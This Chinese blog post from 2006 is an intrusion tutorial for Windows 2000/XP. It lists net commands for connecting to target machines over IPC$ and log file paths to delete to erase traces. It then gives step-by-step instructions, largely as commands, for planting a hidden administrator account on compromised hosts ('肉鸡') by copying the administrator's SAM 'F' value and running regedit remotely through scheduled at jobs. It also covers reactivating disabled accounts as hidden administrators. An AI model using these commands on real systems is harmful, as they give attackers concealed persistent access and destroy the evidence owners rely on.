Chinaunix首页 | 论坛 | 博客
  • 博客访问: 877353
  • 博文数量: 206
  • 博客积分: 10276
  • 博客等级: 上将
  • 技术积分: 2358
  • 用 户 组: 普通用户
  • 注册时间: 2006-04-01 02:41
文章分类

全部博文(206)

文章存档

2014年(1)

2013年(1)

2012年(2)

2011年(10)

2010年(14)

2009年(15)

2008年(33)

2007年(90)

2006年(40)

我的朋友

分类: 网络与安全

2006-04-01 03:10:33

1、利用ipc$入侵的相关命令:
我们在入侵的时候难免遇到忘记命令的时候,现在将我所知道的一些命令总结出来提供给各位。通过这些命令可以解决很大一部分新手的问题。
00:net use
  作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。
  命令格式:
  net use [devicename | *] [\\\\computername\\sharename[\\volume]] [password |     *]] [/user:[domainname\\]username] [[/delete] | [/persistent:{yes | no}]]
  参数介绍:
  (1)键入不带参数的net use列出网络连接。
  (2)devicename指定要连接到的资源名称或要断开的设备名称。
  (3)\\\\computername\\sharename服务器及共享资源的名称。
  (4)password访问共享资源的密码。
  (5)*提示键入密码。
  (6)/user指定进行连接的另外一个用户。
  (7)domainname指定另一个域。
  (8)username指定登录的用户名。
  (9)/home将用户连接到其宿主目录。
  (10)/delete取消指定网络连接。
  (11)/persistent控制永久网络连接的使用。
01: net use \\\\X.X.X.X\\ipc$ \"\" /user:\"\" 建立空连接
02: net use \\\\X.X.X.X\\ipc$ \"密码\" /user:\"用户名\" 建立非空连接
03: net use \\\\X.X.X.X\\ipc$ /del 删除连接
04: net time \\\\X.X.X.X
  作用:使计算机的时钟与另一台计算机或域的时间同步。
  命令格式:net time [\\\\computername | /domain[:name]] [/set]
  参数介绍:
  (1)\\\\computername要检查或同步的服务器名。
  (2)/domain[:name]指定要与其时间同步的域。
  (3)/set使本计算机时钟与指定计算机或域的时钟同步。
05: net view \\\\X.X.X.X
  作用:显示域列表、计算机列表或指定计算机的共享资源列表。
  命令格式:net view [\\\\computername | /domain[:domainname]]
  参数介绍:
  (1)键入不带参数的net view显示当前域的计算机列表。
  (2)\\\\computername 指定要查看其共享资源的计算机。
  (3)/domain[:domainname]指定要查看其可用计算机的域。
06: net use X: \\\\X.X.X.X\\Y 将共享名为Y的共享资源映射为本地X盘
07: net use X: /del 删除映射的X盘
08: net share
  作用:创建、删除或显示共享资源。
  命令格式:net share share name=drive:path [/users:number | /unlimited]   [/remark:\"text\"]   
  参数介绍:(1)键入不带参数的net share显示本地计算机上所有共享资源的信息。   (2)sharename是共享资源的网络名称。
  (3)drive:path指定共享目录的绝对路径。
  (4)/users:number设置可同时访问共享资源的最大用户数。
  (5)/unlimited不限制同时访问共享资源的用户数。
  (6)/remark:\"text \"添加关于资源的注释,注释文字用引号引住。
09: net user
  作用:添加或更改用户帐号或显示用户帐号信息。
  该命令也可以写为 net users
  命令格式:net user [username [password | *] [options]] [/domain]
  参数介绍:(1)键入不带参数的net user查看计算机上的用户帐号列表。
  (2)username添加、删除、更改或查看用户帐号名。
  (3)password为用户帐号分配或更改密码。
  (4)*提示输入密码。
  (5)/domain在计算机主域的主域控制器中执行操作。
10: net start 作用:启动服务,或显示已启动服务的列表。
11: net pause 作用:暂停正在运行的服务。
12: net Continue 作用:重新激活挂起的服务。
13: net stop
  作用:停止 Windows NT 网络服务。
  命令格式:net stop service
  参数介绍:
  (1)alerter(警报)
  (2)client service for netware(Netware 客户端服务)
  (3)clipbook server(剪贴簿服务器)
  (4)computer browser(计算机浏览器)
  (5)directory replicator(目录复制器)
  (6)ftp publishing service (ftp )(ftp 发行服务)
  (7)lpdsvc
  (8)net logon(网络登录)
  (9)network dde(网络 dde)
  (10)network dde dsdm(网络 dde dsdm)
  (11)network monitor agent(网络监控代理)
  (12)nt lm security support provider(NT LM 安全性支持提供)
  (13)ole(对象链接与嵌入)
  (14)remote access connection manager(远程访问连接管理器)
  (15)remote access isnsap service(远程访问 isnsap 服务)
  (16)remote access server(远程访问服务器)
  (17)remote procedure call (rpc) locator(远程过程调用定位器)
  (18)remote procedure call (rpc) service(远程过程调用服务)
  (19)schedule(调度)
  (20)server(服务器)
  (21)simple tcp/ip services(简单 TCP/IP 服务)
  (22)snmp
  (23)spooler(后台打印程序)
  (24)tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)
  (25)ups
  (26)workstation(工作站)
  (27)messenger(信使)
  (28)dhcp client
  (29)eventlog
14:net Statistics
  作用:显示本地工作站或服务器服务的统计记录。
  命令格式:net statistics [workstation | server]
  参数介绍:(1)键入不带参数的net statistics列出其统计信息可用的运行服务。
  (2)workstation显示本地工作站服务的统计信息。
  (3)server显示本地服务器服务的统计信息。  
  例:net statistics server | more显示服务器服务的统计信息。
15:net Session ( 等同于net sessions 或net sess)
 作用:列出或断开本地计算机和与之连接的客户端的会话.
 命令格式:net session [\\\\computername] [/delete]
 参数介绍:(1)键入不带参数的net session显示所有与本地计算机的会话的信息。
(2)\\\\computername标识要列出或断开会话的计算机。
 举例说明: net session \\\\cnse8要显示计算机名为cnse8的客户端会话信息列表。

15: net user 帐号名 密码 /add 添加帐号和密码
16: net user 帐号名 /active:yes 激活帐号
17: net localgroup administrators 帐号名 /add 将该帐号加入本地admin组
18: Net Send
  作用:向网络的其他用户、计算机或通信名发送消息。
  命令格式:net send {name | * | /domain[:name] | /users} message
  参数介绍:(1)name要接收发送消息的用户名、计算机名或通信名。
  (2)*将消息发送到组中所有名称。
  (3)/domain[:name]将消息发送到计算机域中的所有名称。
  (4)/users将消息发送到与服务器连接的所有用户。
  (5)message作为消息发送的文本。
  例:(1)net send /users Welcome to cnse8.com 向所有的连接本机的用户显示       \"Welcome to cnse8.com\"
19:net Config
  作用:显示当前运行的可配置服务,或显示并更改某项服务的设置。
  命令格式:net config [service [options]]
  参数介绍:
  (1)键入不带参数的net config显示可配置服务的列表。
  (2)service通过net config命令进行配置的服务(server或workstation)。
  (3)options服务的特定选项。
20:net Accounts
  作用:更新用户帐号数据库、更改密码及所有帐号的登录要求。
  命令格式:net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length]     [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number]         [/domain]
  参数介绍:
  (1)键入不带参数的net accounts显示当前密码设置、登录时限及域信息。
  (2)/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时。
  (3)/minpwlen:length设置用户帐号密码的最少字符数。  
  (4)/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。
  (5)/minpwage:days设置用户必须保持原密码的最小天数。
  (6)/uniquepw:number要求用户更改密码时,必须在经过number次后才能重复使用与     之相同的密码。
  (7)/domain在当前域的主域控制器上执行该操作。
  (8)/sync当用于主域控制器时,该命令使域中所有备份域控制器同步。
  举例说明:net accounts /minpwlen:7将用户帐号密码的最少字符数设置为7。
21:copy 路径 \\ 文件名 \\IP\\共享目录名
  例:copy c:\\cnse8.exe \\\\X.X.X.X\\c$ 将c盘下的cnse8.exe文件复制到对方得的c     盘内。
    copy \\\\X.X.X.X\\c$\\cnse8.exe c:\\ 将远程机器上的文件cnse8.exe复制到自己
  机器上。
22:at \\\\IP 时间 程序名 远程添加某个计划.


2、终端服务(3389)命令参考
可以从命令提示行激活多个终端服务管理实用程序。下表列出了这些实用程序。

命令 功能
change logon 暂时禁止登录到终端服务器。
change port 由于 MS-DOS 程序的兼容性而更改 COM 端口映射。
change user 更改当前用户的 .ini 文件映射。
cprofile 从用户配置文件中删除用户特定的文件关联。
dbgtrace 启用或禁用调试跟踪。
flattemp 启用或禁用平面型临时目录。
logoff 从会话中注销用户并从服务器上删除会话。
msg 向用户或用户组发送消息。
query process 显示在终端服务器上运行的进程的有关信息。
query session 显示终端服务器上的会话的有关信息。
query termserver 显示网络上所有终端服务器的列表。
query user 显示终端服务器上用户会话的有关信息。
register 注册应用程序以便在系统的全局环境下执行。
reset session 将会话重置为已知的初始值。
shadow 监视另一用户的会话。
tscon 连接到另一个已有的终端服务器会话。
tsdiscon 从终端服务器会话中断开与客户机的连接。
tskill 结束进程。
tsprof 复制用户配置并更改配置文件路径。
tsshutdn 关闭终端服务器。

3、日志清除
C:\winnt\system32\logfiles\*.*
C:\winnt\ssytem32\config\*.evt
C:\winnt\system32\dtclog\*.*
C:\winnt\system32\*.log
C:\winnt\system32\*.txt
C:\winnt\*.txt
C:\winnt\*.lo


4、建立隐藏的超级用户
前几天在某个网站(记不清了,不好意思 ^_*)上看到了一篇介绍如何建立隐藏的超级用户的图文教程,给我了很大的启发,作者只说明了如何在本地图形界面下建立隐藏的超级用户,且作者说他无法在命令行下实现隐藏的超级用户的建立,于是我就开始自已摸索,刚开始时,我用reg.exe(3.0版)作为命令行下导出导入注册表文件的工具,但每次导入以后,建立的隐藏的超级用户总不能用,后来打开注册表查看,发现这个隐藏的超级用户的默认数据类型并没有被导入注册表。由于这种数据类型是十六进制数表示的(如administrator的默认数据类型为000001F4,下面例子中的hacker$的数据类型是00000409)而不是我们常说的字符串型、dword型、二进制型等数据类型,reg.exe不能识别,因而也就无法导入,而在图形界面下用注册表编辑器regedit.exe却能够将这种数据类型导入,后来一想regedit.exe是一个两栖程序,它既可以在windows界面下运行,也可以在DOS下运行,既然图形界面regedit.exe能够导入这种数据类型,那么DOS下面的它也应该能够导入这种数据类型,后来经试验证明了我的想法。下面我把我实现这个隐藏的超级用户建立方法介绍如下:

一、如何在图形界面建立隐藏的超级用户

图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序,修改键值的权限时在右键中点“权限”来修改。对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:

1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户

net user hacker$ 1234 /add

2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口

点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。

打开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。

如何在命令行下远程建立隐藏的超级用户

在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。

对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。

1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地址改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的ip地址。)
2、先与肉鸡建立连接,命令为: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator

3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动):at \\13.50.97.238 12:51

c:\winnt\system32\net.exe user hacker$ 1234 /add

建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。

4、同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:at \\13.50.97.238 12:55

c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\

/e 是regedit.exe的参数,在_LOCAL_MACHINE\SAM\SAM\Domains\account\users\这个键的一定要以\结尾。必要的情况下可以用引号将"c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\"引起来。

5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy \\13.50.97.238\admin$\system32\hacker.reg

c:\hacker.reg

修改的方法图形界中已经介绍过了,这里就不作介绍了。

6、再将编辑好的hacker.reg拷回肉鸡上 copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg

7、查看肉鸡时间:net time \\13.50.97.238 然后用at命令将用户hacker$删除:

at \\13.50.97.238 13:40 net user hacker$ /del

8、验证hacker$是否删除:用

net use \\13.50.97.238 /del 断开与肉鸡的连接。

net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接,不能连接说明已删除。

9、再与肉鸡建立连接:net use \\13.50.97.238\ipc$ "12345678" /user:"administrator"

再取得肉鸡时间,用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:

at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg

regedit.exe的参数/s是指安静模式。

10、再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。

11、再验证用户hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。

12、通过11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删的权限。

三、如果肉鸡没有开3389终端服务,而我又不想用命令行,怎么办?

这种情况下,你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能,你可以用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。

但是这里有两个前提:

1、先用net use \\肉鸡ip\ipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后,才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。

2、远程主机必须开启远程注册表服务(没有开启的话,你也可以远程开启,因为你有超级用户的密码了)。

四、利用被禁用的帐户建立隐藏的超级用户:

我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:

1.想办法查看有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然了会禁用其它用户。在图形界面下,非常容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下,我还没有想到好的办法,只能在命令行下用命令:"net user 用户名"一个一个来查看用户是否被禁用。

2.在这里,我们假设用户hacker被管理员禁用。首先,我先用小榕的超组用户克隆程序CA.exe,将被禁用的用户hacker 克隆成超级用户(克隆之后,被禁用的用户hacker就会自动被激活了): CA.EXE \\肉鸡ip Administrator 超级用户密码 hacher hacher密码。

3.如果你现在一个cmdshell,如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以,这时你只要输入命令:

net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样的),当然你也可以将用户hacher换成其它的被禁用的用户。

4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了,但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user \\肉鸡ip\ipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家,经过我多次试验,次次都能成功,而且还是超级用户权限。

5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式:at \\肉鸡ip 时间 net user hacker /active:no

6.原理:具体的高深的原理我也说不上来,我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会弹出一对话框,并禁止你继续禁用超级用户administrator,同样,因为在克隆时,hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代,因而hacker就具有了超级用户的权限了,但是由于hacker在注册表内"C"健还是原来的"C"键,所以hacker还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用户hacker还是可以连接肉鸡,而且还具有超级用户的权限。具体我也说不明白,大家权且这么理解吧。

五、注意的几点事项:

1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。

2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。

3、如在本机上试验时,最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份,因为本人做试验时,曾出现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。

4、本方法在2000/XP上测试通过,未在NT上测试。本方法仅供研究,请勿将本方法用于破坏上,利用本方法造成严重后果者,由使用者负责,本人概不负责。

阅读(2020) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~